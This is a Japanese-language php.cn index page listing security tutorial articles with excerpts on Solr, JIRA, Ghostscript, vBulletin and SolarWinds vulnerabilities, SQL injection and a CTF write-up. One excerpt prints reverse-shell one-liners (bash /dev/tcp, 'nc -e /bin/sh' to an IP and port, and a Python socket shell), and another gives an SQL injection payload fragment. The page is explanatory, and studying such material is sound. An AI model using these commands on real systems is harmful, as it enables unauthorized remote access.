ページ 33-安全性プログラミングチュートリアル: 安全性オンラインで学ぶ-php.cn

Article Tags

安全性

ホームページ

Technical articles

運用・保守

安全性

Apache Solr ベロシティテンプレートインジェクション RCE 脆弱性の分析例

0x01 はじめに Solr は、Web サービスに似た API インターフェイスを提供する独立したエンタープライズレベルの検索アプリケーションサーバーです。ユーザーは、http リクエストを通じて検索エンジンサーバーに特定の形式の XML ファイルを送信してインデックスを生成できます。また、HttpGet オペレーションを通じて検索リクエストを作成し、XML 形式で返された結果を取得することもできます。 0x02 脆弱性の概要 VelocityResponseWriter コンポーネントは Solr に存在します。攻撃者は、VelocityResponseWriter コンポーネントが指定されたテンプレートのロードを許可するように、関連する構成を変更するための特定のリクエストを作成することができます。これにより、Velocity テンプレートインジェクションのリモートコマンド実行の脆弱性が発生します。攻撃者はこれを悪用します

May 19, 2023 am 10:37 AM

Solr Velocity

JIRA の脆弱性を利用して米軍の非機密インターネットプロトコルルーターネットワークにアクセスする例の分析

以下では、著者が米国国防総省 (DoD) の Hack the Pentagon 脆弱性公開テストプロジェクトに参加し、JIRA 脆弱性 CVE-2017-9506 を使用して SSRF 攻撃対象領域を構築し、米軍の非機密インターネットへのアクセスを実現した方法について説明します。 Protocol Router Network (NIPRnet)、および他の脆弱性技術と組み合わせることで、国防総省イントラネットシステムの一連の機密情報が取得されました。テストのプロセスと内容は機密事項であるため、この記事ではこの点についてのみ触れ、技術的な詳細や詳細なシナリオについてはあまり公開せず、学習と共有のみを目的としていますので、読者の皆様にはご容赦いただければ幸いです。 JIRA は、オーストラリアの Atlassian 社が開発した優れた問題追跡および管理ソフトウェアツールで、さまざまな種類の問題を追跡および管理できます。

May 18, 2023 pm 10:29 PM

jira

SQLインジェクションにはどのような種類がありますか?

はじめに SQL インジェクション攻撃手法は、データベースから返されたコンテンツを処理するアプリケーションに基づいて、明示的インジェクション、エラーインジェクション、ブラインドインジェクションに分類できます。明示的インジェクション攻撃者は、現在のインターフェイスのコンテンツから必要なコンテンツを直接取得できます。エラー挿入データベースクエリによって返された結果はページには表示されませんが、アプリケーションはデータベースエラー情報をページに出力するため、攻撃者はデータベースエラーステートメントを作成し、エラー情報から目的のコンテンツを取得できます。ブラインドインジェクションデータベースクエリの結果は、直感的なページからは取得できず、攻撃者はデータベースロジックを使用するか、データベースライブラリの実行を遅延させることで、目的のコンテンツを取得します。 MySQL 手動インジェクション複合インジェクション?id=1'orderby4--

May 18, 2023 pm 10:05 PM

SQL

リバウンドシェルとは何ですか？

1.bash リバウンド bash-i>&/dev/tcp/ip_address/port0>&12.nc リバウンド nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.

May 18, 2023 pm 10:01 PM

shell

NSAの新しいAPTフレームワークDarkPulsarの使い方

序文 2017 年 3 月、ShadowBrokers は、DanderSpritz と FuzzBunch という 2 つのフレームワークを含む機密文書を公開し、世界に衝撃を与えました。 DanderSpritz は完全にプラグインで構成されており、情報を収集し、脆弱性を悪用し、乗っ取られたデバイスを操作するために使用されます。これは Java で書かれており、ボットネット管理パネルに似たグラフィカルインターフェイスと、Metasploit ツールに似たコントロールパネルを提供します。また、FuzzBunch によって制御されていないデバイス用のバックドアとプラグインも組み込まれています。 DanderSprit インターフェイスの概要 Fuzzbunch は、さまざまなタイプのプラグインを含む、さまざまなユーティリティが相互作用して連携するためのフレームワークを提供します。

May 18, 2023 pm 08:14 PM

nsaDarkPulsar

Ghostscript SAFER サンドボックスバイパスの脆弱性を分析する方法

はじめに Ghostscript は、Adobe PostScript 言語のインタープリタソフトウェアです。 PostScript 言語で描画でき、PS と PDF 間の変換をサポートします。現在、Ghostscript はほとんどの Linux ディストリビューションにデフォルトでインストールされており、Unix、MacOS、Windows、その他のプラットフォームに移植されており、ImagineMagic、PythonPIL、さまざまな PDF リーダーなどのプログラムでも使用されています。脆弱性の説明 8 月 21 日、Google のセキュリティ研究者である Tavis Ormandy 氏は、複数の GhostScript の脆弱性を公開しました。

May 18, 2023 pm 07:10 PM

ghostscriptSAFER

DDCTF2019两个逆向分别是什么

01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的，直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"

May 18, 2023 pm 05:13 PM

DDCTFwriteup

制限を回避して Google の内部管理システムにアクセスした例の分析

ある日、Google の脆弱性を調べていたところ、公開されている脆弱性から Google 独自のサービスの IP アドレスをいくつか発見しましたが、最初はこれらの IP アドレスで何ができるのか全く分かりませんでした。まずこれらの IP アドレスを確認したところ、Google の内部 IP の一部が含まれていることがさらにわかりました。最近、友人の KLSREERAM が Google の内部 IP に関連する脆弱性を報告し、別の友人の Vishnu が Google のサブドメインを使用してコントロールパネルにアクセスする脆弱性を報告したことを突然思い出しました。現在、両方の脆弱性は Google によって修正されており、これら 2 つの脆弱性に関連する内部 IP アドレスにはインターネットからアクセスできません。しかし今、目の前にいくつかの内部 Google IP アドレスがあるので、それができるかどうかを確認する方法を見つけなければなりません。

May 18, 2023 pm 03:19 PM

Google

Disk Pulse Enterprise Windowアプリケーションの脆弱性解析の実施方法

1. 脆弱性の概要 DiskPulseEnterprise はディスクの変更を監視するソフトウェアであり、管理ポート 9120 または Web 管理ウィンドウ 80 を介してソフトウェアに接続して管理し、ディスクの変更を監視できます。 DiskPulse Enterprise にはダイナミックリンクライブラリ libspp.dll があり、これには HTTP 操作を担当するいくつかの関数が含まれています。この問題はこのダイナミックリンクライブラリで発生します。ポストデータを処理する際、ポストデータの長さは厳密に制御されていないため、取得したデータを実行すると、無効なメモリにデータをコピーしてバッファオーバーフローを引き起こし、SEHの異常動作処理を引き起こし、最終的にはEIPを制御して任意のコードを実行させます。ソフトウェアのダウンロードリンク:h

May 18, 2023 pm 03:04 PM

windowDisk Pulse Eneterprise

APP クラッシュの主な原因は何ですか?

1. どのようなシナリオがクラッシュ問題を引き起こす可能性がありますか? 最近、私はどのような問題がクラッシュを引き起こす可能性があるのか、つまり異常な思考を持っているのかについて考えています。「ちょうど 2 日前。『ポリス』で、主人公のジョン・ノーランが逃走者の車をパトカーで止めるのに失敗し、逃走者が逃走するシーンがあります。このシーンとテストとの関係は何ですか？」まず第一に、普通の人は道路を運転するときに他人との衝突を避けます。これは機能をテストする主要なプロセスのようなもので、ランダムな入力は行いませんが、警察官は違います。彼は捕まえるために必要なことは何でもします。すべての方法、これはテストプロセス中に機能を使いにくくするためにどのように操作するかを考える異常な思考のようなものです。ガイド1. 異常動作各種異常動作

May 18, 2023 pm 01:55 PM

App

MySQL データベースの一般的なテクニックは何ですか?

1. サーバーの種類はどのように選択すればよいですか? MySQL サーバー設定ウィンドウの各パラメーターの意味は次のとおりです。 [ServerConfigurationType] このオプションは、サーバーのタイプを設定するために使用されます。このオプションの右側にある下ボタンをクリックすると、3 つのオプションが表示されます。 3 つのオプションの具体的な意味は次のとおりです。開発マシン: このオプションは、典型的な個人用デスクトップワークステーションを表します。マシン上で複数のデスクトップアプリケーションが実行されていると仮定します。最小限のシステムリソースを使用するように MySQL サーバーを構成します。 ServerMachine (サーバー): このオプションはサーバーを表します。MySQL サーバーは、FTP、ema などの他のアプリケーションと一緒に実行できます。

May 18, 2023 pm 01:29 PM

MySQL

SolarWinds サプライチェーン APT 攻撃事件のセキュリティリスク分析例

背景米国のトップセキュリティ企業FireEye（中国名：火炎）は12月13日、世界規模の侵入活動を発見したとの報告書を発表し、この組織をUNC2452と命名した。 APT組織はSolarWinds社に侵入し、SolarWindsOrion商用ソフトウェアアップデートパッケージに悪意のあるコードを埋め込んで配布しており、FireEyeはこれをSUNBURSTマルウェアと呼んでいた。バックドアには、ファイルの転送、ファイルの実行、システムの分析、マシンの再起動、システムサービスの無効化などの機能が含まれており、横方向の移動やデータの盗難が可能になります。 SolarWindsOrionPlatform は、強力でスケーラブルなインフラストラクチャ監視および管理プラットフォームです。

May 18, 2023 pm 12:52 PM

aptsolarwinds

vBulletin 5.x のリモートコード実行の脆弱性の分析例

vBulletin コンポーネントの紹介 vBulletin は、フォーラムおよびコミュニティ公開ソフトウェアの世界的リーダーです。そのセキュリティ、強力な管理機能とスピード、および 40,000 を超えるオンラインコミュニティにサービスを提供する能力は、顧客から高く評価されています。多くの大規模フォーラムは、コミュニティとして vBulletin を選択しています。 vBulletin の公式 Web サイトに表示されている顧客リストから、有名なゲーム制作会社 EA、有名なゲームプラットフォーム Steam、日本の大手多国籍企業ソニー、米国 NASA がすべて顧客であることがわかります。中国には、Hummingbird.com、51 Group Buying、Ocean Tribe、および数万人が vBull を使用しているその他のオンラインフォーラムなど、多くの大規模顧客もあります。

May 18, 2023 am 11:46 AM

vBulletin

積極的な攻撃下で Google が Chrome のゼロデイ脆弱性を修正した例の分析

Googleは25日、悪用が活発に行われているゼロデイ脆弱性を含む3件のセキュリティ脆弱性を修正するChromeアップデートをリリースした。これらの攻撃の詳細や、Chrome ユーザーに対して脆弱性がどのように悪用されたかは公開されていません。この攻撃は、Google の脅威分析チームのメンバーである Clement Lecigne 氏によって 2 月 18 日に発見されました。 Google 脅威分析グループは、脅威アクターのグループを調査および追跡する Google の部門です。 Chrome バージョン 80.0.3987.122 では、ゼロデイ脆弱性が修正されています。このアップデートは Windows、Mac、Linux ユーザーが利用できますが、ChromeOS、iOS、Android ユーザーも利用できます。

May 18, 2023 am 11:25 AM

GoogleChrome 0-day